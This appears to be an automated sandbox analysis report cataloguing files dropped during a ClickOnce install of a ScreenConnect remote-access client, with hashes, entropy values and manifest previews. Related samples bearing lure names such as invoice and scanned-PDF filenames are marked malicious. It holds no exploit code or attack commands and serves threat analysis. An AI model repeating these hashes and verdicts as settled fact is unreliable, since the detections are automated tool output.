                                                                                                                                                                                                                                                                        SHA-512:84FF99485BF32CE36E8EC14806C601506A7D59C6645037CC3BE099F379DCDB1FC129CBC7E5A91F17AD981ADF58B73701D0C0D17FD2048717A6F7C3FD57EE1757
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ..........^.....(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                        Entropy (8bit):4.001068160367756
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKYRCZk5RvN9zEZ5KfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlA4:lZiXuUmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                        MD5:290C4414BE0B3F18C3826684047BCA46
                                                                                                                                                                                                                                                                        SHA1:0416B7DCE3EA2ACDAD4AD1B030E9D5137E105886
                                                                                                                                                                                                                                                                        SHA-256:62EE361A1FE274B94648348C8555C505CB010FAA9C5458F23D82DA6817B94D5B
                                                                                                                                                                                                                                                                        SHA-512:C11415C50436313ABF8ED2F822AF63E5C10CD8A660C8CEE14A41A9E950B7E4FD64605C78023239FD91E3C949A12853C4A392D1A6446A7B7704B78C7A8FB095A6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ....(......)....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                                        Entropy (8bit):3.0607728827192604
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kK9tLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:rLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                        MD5:6A1A6399BBDC0743728D8CBF8423BED0
                                                                                                                                                                                                                                                                        SHA1:131560F11F835644085BDCE6038C231C97D586B5
                                                                                                                                                                                                                                                                        SHA-256:4C62B06F3F6C6E62E525D1C16A91CF4E5E87809E6E95658BE3B63E2AB8162673
                                                                                                                                                                                                                                                                        SHA-512:B1538769A8676AA9EFBC606B293D59FDF32DB2672E028685E5012F42600B4EC5429D7C3C3AFCAB1D2B5D5695120739E356E47637BDEEEB9C92F9F49D991DBF23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ....l....&N....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                                        Entropy (8bit):5.063405177250811
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ilqCCfGo26tX9DkX9R/QPIBM7YV+++amtK/:is5J26tX9DkX9R/QPI+0V+++amtg
                                                                                                                                                                                                                                                                        MD5:15B1110937FDB25DAB468D9E01169767
                                                                                                                                                                                                                                                                        SHA1:1A9BBB23FA152AA96481597390C690B7798E6156
                                                                                                                                                                                                                                                                        SHA-256:05F1D4BDFF9B5ABEB27D87B6CFB23D9CA2BF80D0C57414B197EBED7F9EA62834
                                                                                                                                                                                                                                                                        SHA-512:3A929CA5BD46CAFD4B6997028F5F4361AFF3FE535BE293E40E3A11EBF6104CD60B1B729E5C54E060930213EA83C5B4D702CD844AC549CC2C24391229CB748CF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17866
                                                                                                                                                                                                                                                                        Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                        MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                        SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                        SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                        SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                                        Entropy (8bit):4.3298089371368835
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:nfJ3uWWmeV+WwQXlmL4MckVM8Aw+QhIYX:nR3CJUUMckmb9Yf
                                                                                                                                                                                                                                                                        MD5:BDCFD58909C6571884D81E95F537EBDB
                                                                                                                                                                                                                                                                        SHA1:A6ED0579A59AD5F57EFE8EA04CBB9019E5393694
                                                                                                                                                                                                                                                                        SHA-256:1B46B9AF10BDA9070C5D54C338F95D8758EDBA59DA88E1987B18EA33978EC857
                                                                                                                                                                                                                                                                        SHA-512:EEC2A37D40585E23BEBD3D4D70356E71F491CB5D91007FAA48A599A5020CEC22F2A0C2D2F36F5333524163C8022B7F907BB663D03E3CB9AA63476EC66F935199
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH.........)..gb.E#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................X...............................................X...............................................X...............................................X...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                        MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                        SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                        SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                        SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5260
                                                                                                                                                                                                                                                                        Entropy (8bit):4.185506185194233
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:lNq6R84TeV+Ww7mk9O43jYHlIgBXw05X3W3wnjIbm:1R84UJC9tUHlXBXlZjd
                                                                                                                                                                                                                                                                        MD5:D73C912CA6C2686D8E92F5C70DBF57FF
                                                                                                                                                                                                                                                                        SHA1:663619BB39C9437E4664B06E3A499A4C1B750058
                                                                                                                                                                                                                                                                        SHA-256:E8A5DE1D7210D5A75B0AB1D93237EDA530B03EBF1E1770D1C0B38ECFB81A85E7
                                                                                                                                                                                                                                                                        SHA-512:0605A6F99DD3B6184B328113807F5682A214F310D258CD66979DADCAF82B65D5711C89FFF99B241EF050C583FB86593A75322034FCB67DF241EEC76ECA5A9FBC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1982
                                                                                                                                                                                                                                                                        Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                        MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                        SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                        SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                        SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6588
                                                                                                                                                                                                                                                                        Entropy (8bit):3.962933131280546
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:nMmxgeV+WwwU8WpUB96x9ESvdg98ujt5ZRksJqi/D5:jxPJwpCQx97vA8WXUw75
                                                                                                                                                                                                                                                                        MD5:0DCE618218A6E615DAE6E9E120E4DC72
                                                                                                                                                                                                                                                                        SHA1:C750B8E86BBA00F97B78FDA9CBF565D0A27C51D2
                                                                                                                                                                                                                                                                        SHA-256:9E082767E67FF1F5CDD3FD434551D86F4A6B6D07B4D9A55BEDD43D9037832634
                                                                                                                                                                                                                                                                        SHA-512:E7600B9F00DDA019E8893E2A50F62E50E341B510C0717A836E642EC6C9233410A5E0246213E58EE8ABEC667B872E10F4C20BA50D01B3C81251123B255C62C677
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2573
                                                                                                                                                                                                                                                                        Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                        MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                        SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                        SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                        SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                                        Entropy (8bit):4.510369923107943
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:UvMQScUgIe6S+9oww7g47JNg0P/ruX3gnwbb:qXScIeV+WwwnHgLX3gnEb
                                                                                                                                                                                                                                                                        MD5:32A35F2EFE99C9752F95150E541110BC
                                                                                                                                                                                                                                                                        SHA1:E5DC52FB2EE7825A2C70CC7B6A7D0C4F5CC3FD16
                                                                                                                                                                                                                                                                        SHA-256:A9B521DDD0B94A417FC51686027DF50BFF6F79714791EBDAB1D015BB8BC91C54
                                                                                                                                                                                                                                                                        SHA-512:A5FBF8B89DA2AA525A5316FF649DC40D2321119AE816C1EFFBC7DC607F3DBA24CC9558978496FE8B70BE651873CD8605F57203ACF5432ACD7086EF1D70C9DDCF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                        MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                        SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                        SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                        SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14612
                                                                                                                                                                                                                                                                        Entropy (8bit):5.807948515435699
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:a9Wh4+An9q5s6IHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoILgSl4uj:6WY9qS6ITX9dX9R/QPIBM7Y+lr
                                                                                                                                                                                                                                                                        MD5:CBA41DD6B2F1C63FE0B7F15C6A0D98DA
                                                                                                                                                                                                                                                                        SHA1:F0650F70FFF25C37E5303F0F27B6DD95F5B74059
                                                                                                                                                                                                                                                                        SHA-256:88179CFCD3CC5018DAED05014567C69F1DE987D510EC119F76E33D22D078709A
                                                                                                                                                                                                                                                                        SHA-512:8B4C3106A119938D909C3EDF0D61AD4D161CED32C99B066E5B08D32FF5B037BC5767F5751FD6FB9FE99E2724C8EF69F608012FC844400550E6D60683661A0735
                                                                                                                                                                                                                                                                        Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:dropped
Size (bytes):242016
Entropy (8bit):5.858471214140723
Encrypted:false
SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
MD5:D8259314C0A0D0B11E4979470E4B973A
SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:data
Category:dropped
Size (bytes):4428
Entropy (8bit):4.0764712625321975
Encrypted:false
SSDEEP:48:pQKXCD5v+NgLe6S+9ow87gFW75uvW/vOTV4gQKLfOfTh5ukoDprOaJCf:pvX4eV+Ww8U45u0OOgQKLeThwkoNOrf
MD5:732FD14667B1B15CB8790226CBECC20E
SHA1:343741D9D188F1776E717754658F93999F7FCB05
SHA-256:73E4660E107B15C868102F76D81E54CA22FDDF329A522AF9ADBC17AE30C2EC4B
SHA-512:F697B86ADF2F17DB9CF7CFAADC74701A63D79F601841F23C5CC7CFE7C2F0A6B9F3A95029F6EE29A6393AF9C14B3E6A8C20924556768FF5B97B76582FCF501F8C
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1636
Entropy (8bit):5.084538887646832
Encrypted:false
SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:E11E5D85F8857144751D60CED3FAE6D7
SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):95520
Entropy (8bit):6.505346220942731
Encrypted:false
SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:361BCC2CB78C75DD6F583AF81834E447
SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious
• Filename: E_BILL0041272508.exe, Detection: malicious
• Filename: Scan_PDF_5255303072.exe, Detection: malicious
• Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious
• Filename: Scan_PDF_2017163298.exe, Detection: malicious
• Filename: He6pI1bhcA.exe, Detection: malicious
• Filename: 5eRyCYRR9y.exe, Detection: malicious
• Filename: VD01NDHM8u.exe, Detection: malicious
• Filename: vovE92JSzK.exe, Detection: malicious
• Filename: s9POKY8U8k.exe, Detection: malicious
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):61216
Entropy (8bit):6.31175789874945
Encrypted:false
SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:6DF2DEF5E591E2481E42924B327A9F15
SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
